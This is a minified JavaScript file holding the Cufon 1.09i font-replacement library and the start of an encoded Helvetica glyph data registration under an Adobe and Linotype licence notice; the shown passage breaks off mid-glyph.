/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());

/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright (c) 1985, 1987, 1991, 1993 Adobe Systems Incorporated. All Rights
 * Reserved.Helvetica is a trademark of Linotype-Hell AG and/or its subsidiaries.
 * 
 * Trademark:
 * Helvetica is a trademark of Linotype-Hell AG and/or its subsidiaries.
 * 
 * Description:
 * The digitally encoded machine readable software for producing the Typefaces
 * licensed to you is copyrighted (c) 1985, 1987, 1991, 1993 Adobe Systems. All
 * Rights Reserved. This software is the property of Adobe Systems Incorporated and
 * its licensors, and may not be reproduced, used, displayed, modified, disclosed
 * or transferred without the express written approval of Adobe. The digitally
 * encoded machine readable outline data for producing the Typefaces licensed to
 * you is copyrighted (c) 1981 Linotype-Hell AG and/or its subsidiaries. All Rights
 * Reserved. This data is the property of Linotype-Hell AG and/or its subsidiaries
 * and may not be reproduced, used, displayed, modified, disclosed or transferred
 * without the express written approval of Linotype-Hell AG and/or its
 * subsidiaries.
 * 
 * Vendor URL:
 * http://www.linotypelibrary.com
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"90,-346r0,47r-57,0r0,-47r57,0xm111,-346r57,0r0,47r-57,0r0,-47xm101,-42v20,0,21,-20,22,-39r-1,-123v0,-15,-8,-24,-22,-24v-18,0,-22,16,-22,36r0,124v2,13,8,26,23,26xm101,-276v54,0,85,28,85,80v-2,96,21,202,-85,202v-106,0,-86,-105,-87,-202v0,-52,32,-80,87,-80","w":200},{"d":"125,-283v3,55,-74,67,-111,42v-12,-8,-18,-22,-19,-42r28,0v4,30,71,31,75,0r27,0","w":119},{"d":"102,-350r36,53r-50,0r-61,-53r75,0xm100,6v-55,0,-86,-25,-85,-81r0,-195r63,0r0,204v0,15,6,24,22,24v16,1,21,-12,22,-26r0,-202r63,0r0,195v1,56,-29,81,-85,81","w":200},{"d":"79,-256v-20,0,-31,14,-30,35r30,0r0,57r-57,0v-2,-57,-6,-114,57,-112r0,20","w":100,"k":{"\u2018":6}},{"d":"99,-276v63,0,92,32,86,100r-63,0v1,-24,0,-51,-20,-52v-20,-1,-24,9,-25,28r0,134v0,16,6,24,23,24v27,-1,23,-34,23,-63r63,0v6,74,-20,111,-91,111v-100,0,-81,-104,-81,-196v0,-59,26,-86,85,-86","w":200},{"d":"101,-346r57,0r0,47r-57,0r0,-47xm80,-346r0,47r-57,0r0,-47r57,0xm17,0r0,-270r145,0r0,54r-82,0r0,50r79,0r0,54r-79,0r0,58r86,0r0,54r-149,0"},{"d":"54,-173v17,0,13,-21,13,-38v-11,7,-25,7,-25,25v0,7,4,13,12,13xm54,-276v30,0,48,8,48,37v0,29,-2,62,3,87r-34,0v-1,-3,0,-9,-3,-11v-15,25,-67,18,-64,-18v-7,-47,52,-29,63,-60v0,-7,-3,-11,-11,-11v-11,-1,-14,6,-14,17r-36,0v-1,-30,19,-41,48,-41","w":108},{"d":"81,64v22,3,24,-26,4,-26v-5,0,-10,1,-15,4r-9,-9r16,-27v-37,-4,-59,-21,-59,-62r0,-82v-13,-76,93,-85,131,-50v13,12,17,33,15,61r-54,0v-1,-17,1,-39,-18,-39v-15,0,-17,12,-17,25r0,83v0,13,4,24,18,23v20,-1,18,-26,18,-47r55,0v3,55,-17,88,-68,88v-3,6,-11,12,-10,17v23,-5,47,2,47,26v0,42,-62,39,-93,24r8,-16v10,2,18,8,31,7"},{"d":"80,-282r53,0r-43,54r-60,0r-43,-54r53,0r20,27","w":119},{"d":"80,-49v68,13,36,-81,42,-138v3,-28,-13,-35,-42,-34r0,172xm185,-71v4,83,-87,72,-168,71r0,-270v86,-1,168,-10,168,79r0,120","w":200},{"d":"87,-36v27,-1,20,-35,21,-62v-18,11,-41,13,-42,41v0,12,8,21,21,21xm164,-282r-62,54r-49,0r36,-54r75,0xm166,-146v1,48,-5,106,4,146r-56,0r-3,-18v-25,39,-102,29,-102,-30v0,-66,57,-63,95,-87v9,-11,3,-36,-14,-34v-19,-1,-21,14,-22,31r-57,0v-2,-48,28,-69,78,-69v49,0,76,15,77,61"},{"d":"91,-170v-20,-1,-21,21,-20,41r40,0v1,-22,-1,-40,-20,-41xm91,-207v44,0,77,15,77,58r0,58r-97,0v1,24,-6,56,18,56v19,0,19,-18,20,-35r57,0v2,52,-24,76,-75,76v-45,0,-77,-16,-77,-62r0,-82v-1,-50,28,-69,77,-69"},{"d":"122,-113r0,11r32,0r0,22r-32,0r0,18r32,0r0,22r-32,0r0,40r-65,0r0,-40r-32,0r0,-22r32,0r0,-18r-32,0r0,-22r32,0r0,-11r-63,-157r69,0r27,88r28,-88r68,0"},{"d":"174,-350r-62,53r-49,0r36,-53r75,0xm100,6v-55,0,-86,-25,-85,-81r0,-195r63,0r0,204v0,15,6,24,22,24v16,1,21,-12,22,-26r0,-202r63,0r0,195v1,56,-29,81,-85,81","w":200},{"d":"155,-202r-45,101r47,101r-58,0v-7,-19,-11,-41,-19,-58r-18,58r-59,0r47,-101r-45,-101r57,0v7,18,10,40,18,57r18,-57r57,0","w":159},{"d":"122,-42v21,0,35,-11,43,-27r0,60v-12,10,-29,16,-49,16v-62,-2,-82,-49,-91,-104r-23,0r6,-23r15,0r0,-24r-21,0r6,-23r17,0v-1,-82,90,-136,154,-79r-15,52v-6,-25,-54,-40,-68,-10v-5,10,-9,24,-11,37r71,0r-6,23r-67,0r-1,24r61,0r-6,23r-52,0v4,26,10,55,37,55"},{"d":"18,0r0,-270r149,0r0,54r-86,0r0,48r79,0r0,54r-79,0r0,114r-63,0","k":{"A":13,".":40,",":40}},{"d":"60,-343r60,0r43,54r-53,0r-20,-27r-20,27r-53,0xm17,0r0,-270r145,0r0,54r-82,0r0,50r79,0r0,54r-79,0r0,58r86,0r0,54r-149,0"},{"d":"0,45r0,-18r180,0r0,18r-180,0"},{"d":"162,-256v-20,0,-31,14,-30,35r30,0r0,57r-57,0v-2,-57,-5,-113,57,-112r0,20xm76,-256v-20,0,-31,14,-30,35r30,0r0,57r-57,0v-2,-57,-6,-114,57,-112r0,20"},{"d":"174,-350r-62,53r-49,0r36,-53r75,0xm100,-182r33,-88r63,0r-65,157r0,113r-63,0r0,-113r-64,-157r64,0","w":200},{"d":"24,-168r0,-98r43,0r0,98r-43,0","w":90},{"d":"87,-36v27,-1,20,-35,21,-62v-18,11,-41,13,-42,41v0,12,8,21,21,21xm101,-277r57,0r0,47r-57,0r0,-47xm80,-277r0,47r-57,0r0,-47r57,0xm166,-146v1,48,-5,106,4,146r-56,0r-3,-18v-25,39,-102,29,-102,-30v0,-66,57,-63,95,-87v9,-11,3,-36,-14,-34v-19,-1,-21,14,-22,31r-57,0v-2,-48,28,-69,78,-69v49,0,76,15,77,61"},{"d":"90,-166v-13,0,-18,11,-18,23r0,90v0,12,6,18,18,18v12,0,18,-6,18,-18r0,-90v0,-12,-5,-23,-18,-23xm90,6v-44,0,-74,-17,-75,-62r0,-82v0,-48,27,-69,75,-69v49,0,75,21,75,69r0,82v-2,45,-30,62,-75,62"},{"d":"15,-44r0,-47r37,-21r-37,-23r0,-47r65,43r0,53xm102,-44r0,-47r36,-21r-36,-23r0,-47r65,43r0,53"},{"d":"74,-340v26,0,56,30,68,1r29,0v-5,25,-16,46,-45,47v-27,1,-58,-29,-68,3r-28,0v6,-25,13,-51,44,-51xm71,-151v-2,47,4,102,5,151r-61,0r0,-270r66,0r50,151r-6,-151r60,0r0,270r-65,0","w":200},{"d":"12,-141r29,-29r49,49r49,-49r29,29r-48,49r48,49r-29,29r-49,-49r-49,49r-29,-29r49,-49"},{"d":"130,-278v-4,26,-16,47,-45,48v-26,1,-57,-31,-67,2r-28,0v4,-27,14,-50,44,-51v27,-2,55,30,68,1r28,0","w":119},{"d":"102,-350r36,53r-50,0r-61,-53r75,0xm101,-42v20,0,21,-20,22,-39r-1,-123v0,-15,-8,-24,-22,-24v-18,0,-22,16,-22,36r0,124v2,13,8,26,23,26xm101,-276v54,0,85,28,85,80v-2,96,21,202,-85,202v-106,0,-86,-105,-87,-202v0,-52,32,-80,87,-80","w":200},{"d":"100,-221r-19,121r37,0xm174,-350r-62,53r-49,0r36,-53r75,0xm3,0r59,-270r77,0r58,270r-64,0r-9,-53r-49,0r-8,53r-64,0","w":200},{"d":"78,-155r-4,34r31,0r4,-34r-31,0xm167,-80r-36,0r-11,80r-31,0r10,-80r-30,0r-11,80r-32,0r10,-80r-33,0r0,-41r39,0r5,-34r-34,0r0,-41r39,0r10,-74r32,0r-10,74r31,0r10,-74r32,0r-10,74r30,0r0,41r-36,0r-4,34r30,0r0,41"},{"d":"173,-146v23,-5,18,-39,-7,-39r-49,0r0,40xm221,-164v-1,29,-15,38,-42,41r37,65r-39,0r-33,-61r-27,0r0,61r-33,0r0,-153v58,3,140,-18,137,47xm256,-137v0,-66,-41,-105,-107,-105v-66,0,-106,39,-106,107v0,68,40,107,106,107v67,0,107,-42,107,-109xm291,-135v0,87,-54,141,-142,141v-91,0,-141,-55,-141,-141v0,-85,50,-141,141,-141v90,0,142,55,142,141","w":298},{"d":"91,-170v-20,-1,-21,21,-20,41r40,0v1,-22,-1,-40,-20,-41xm101,-277r57,0r0,47r-57,0r0,-47xm80,-277r0,47r-57,0r0,-47r57,0xm91,-207v44,0,77,15,77,58r0,58r-97,0v1,24,-6,56,18,56v19,0,19,-18,20,-35r57,0v2,52,-24,76,-75,76v-45,0,-77,-16,-77,-62r0,-82v-1,-50,28,-69,77,-69"},{"d":"30,0r0,-62r61,0r0,62r-61,0xm44,-87v-8,-59,-19,-113,-16,-183r64,0v3,69,-8,125,-16,183r-32,0","w":119},{"d":"-3,-269v43,-6,84,3,78,47v3,42,-12,100,27,105v-39,3,-27,58,-27,98v0,46,-31,60,-78,52v60,-9,-6,-136,56,-150v-43,-6,-26,-67,-29,-112v-1,-22,-7,-37,-27,-40","w":98},{"d":"22,0r0,-270r57,0r0,270r-57,0","w":100},{"d":"149,0r0,-62r61,0r0,62r-61,0xm270,0r0,-62r60,0r0,62r-60,0xm30,0r0,-62r60,0r0,62r-60,0","w":360},{"d":"119,-216r